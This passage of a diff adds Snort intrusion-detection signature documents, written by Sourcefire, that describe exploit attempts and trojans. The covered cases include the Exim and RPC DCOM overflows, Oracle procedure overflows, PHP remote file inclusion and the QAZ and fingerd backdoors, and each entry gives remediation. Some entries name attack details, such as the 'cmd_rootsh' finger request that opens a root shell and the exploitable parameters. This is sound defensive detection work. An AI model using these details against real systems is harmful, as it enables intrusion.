+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2594.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2594
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/147.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+147
+
+--
+Summary:
+Gatecrasher is a Trojan Horse capable of stealing passwords and key 
+logging.
+
+--
+Impact:
+Possible theft of data and passwords.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Gatecrasher
+server to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named system.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Command
+
+Removal of this entry is required.
+
+Delete the file system.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS99
+
+--
--- /dev/null
+++ b/doc/signatures/3410.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3410
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/775.txt
@@ -0,0 +1,97 @@
+Rule:
+
+--
+Sid:
+775
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
--- /dev/null
+++ b/doc/signatures/3174.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3174
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/729.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+729
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/720.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+720
+
+--
+Summary:
+This event is generated when email is received from a Post Office Protocol (POP) server that may contain an attachment with the Snow White worm.
+
+--
+Impact:
+Possible system compromise.  The worm can alter system files and registry key settings. 
+
+--
+Detailed Information:
+The Snow White worm, also known as Hybris, may contain text with a unique misspelling of "Suddlently".  This worm attempts to write to the wsock32.dll library.  It may also attempt to alter registry key settings.
+
+--
+Affected Systems:
+Microsoft Win32 systems.
+
+--
+Attack Scenarios:
+The worm is spread by e-mail and attempts to infect other hosts when a user opens the e-mail attachment. 
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event is triggered when an e-mail is received from a POP server that contains the misspelled word "Suddlently".
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Make sure that the suspected infected host has the most current anti-virus software.  
+
+Run a virus scan on the suspected infected host.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+F-Secure:
+http://www.f-secure.com/v-descs/hybris.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/2576.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2576
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use an inbuilt procedure to generate triggers
+needed for database replication. The "generate_replication_support"
+procedure contains a programming error that may allow an attacker to
+execute a buffer overflow attack.
+
+This overflow is triggered by long strings in some parameters for the
+procedure.
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+Affected Systems:
+	Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to either the "package_prefix" or
+"procedure_prefix" variables to cause the overflow. The result could
+permit the attacker to gain escalated privileges and run code of their
+choosing.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Application Security Inc.
+https://www.appsecinc.com/Policy/PolicyCheck93.html
+
+--
--- /dev/null
+++ b/doc/signatures/1725.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1725
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of an Active Server Page (ASP) using a malformed HTR request. 
+
+--
+Impact:
+Information gathering.  Fragments of the source code of an ASP may be returned possibly disclosing sensitive information.
+
+--
+Detailed Information:
+HTR is an older scripting language still supported by Internet Information Service (IIS).  HTR requests are preocessed by ISM.DLL that improperly evaluates malformed HTR requests.  This may disclose parts of the source code associated with a .asp file referenced in the request. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a malformed request to disclose source code possibly revealing sensitive information. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0063
+
+Bugtraq
+http://www.securityfocus.com/bid/1488
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-031.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1153.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1153
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2870.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2870
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_date
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1002.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid: 1002
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worms attacks on a server against time. The
+HotSaNIC system displays 'WEB-IIS cmd.exe access ' attempts on the
+server in an image file named thumb-cmd.exe.gif. Each time this image
+is accessed it generates an event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/320.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid: 320
+
+-- 
+Summary: 
+This event is generated when access to a known UNIX backdoor deployed by attackers is attempted. In this case it may be a connection to a Trojaned version of fingerd.
+
+-- 
+
+Impact: 
+Remote system compromise leading to a compromise of all resources the host is connected to.
+
+--
+Detailed Information:
+The rule generates an event when access to a "fingerd" backdoor is attempted, this was often found on compromised UNIX machines in the late 1990s. The Trojan finger daemon runs as "root" and is started by inetd with parameters from inetd.conf file unlike the regular finger daemon which runs as "nobody" and replaces the regular "fingerd" binary. It allows its owner to execute several commands remotely by sending a finger request to a specific user. Particularly, the finger request for the user "cmd_rootsh" spawns a root shell bound to the finger port and allows remote command execution.
+
+--
+
+Attack Scenarios: 
+An attacker gains access to a UNIX machine via a remote exploit, then downloads and deploys the "fingerd" trojan. Next, the attacker only needs to send a finger request to gain root access with no password.
+
+-- 
+
+Ease of Attack: 
+The victim host is most likely already compromised.
+
+-- 
+
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known
+
+-- 
+
+Corrective Action: 
+
+Restore the system from a known good backup.
+
+Reinstall the operating system.
+
+--
+Contributors: 
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10070
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0660
+
+SANS:
+http://www.sans.org/y2k/TFN_toolkit.htm
+http://www.sans.org/y2k/fingerd.htm
+
+--
--- /dev/null
+++ b/doc/signatures/100000665.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000665
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "edit.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000737.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000737
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "EditHeader.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "EditHeader.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000711.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000711
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "raids.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "raids.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2128.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2128
+
+--
+Summary:
+This event is generated when an attempt is made to access srsrv.cgi on a
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability that affects Neoteris Instant Virtual Extranet, 
+an appliance-based VPN solution.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in Neoteris Instant Virtual Extranet.
+An attacker can pass an argument to srsrv.cgi that bypasses 
+authentication, and can allow the attacker to hijack a legitimate user's
+VPN session. 
+
+--
+Affected Systems:
+Neoteris Instant Virtual Extranet 3.01 and earlier.
+
+--
+Attack Scenarios:
+An attacker can pass a specific argument to srsrv.cgi that bypasses 
+authentication and can hijack a legitimate user's VPN session.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch provided by Neoteris (https://support.neoteris.com).
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7510
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0217
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11608
+
+--
--- /dev/null
+++ b/doc/signatures/937.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+937
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000796.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000796
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c1" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/2907.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2907
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_snapshot_repobject
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
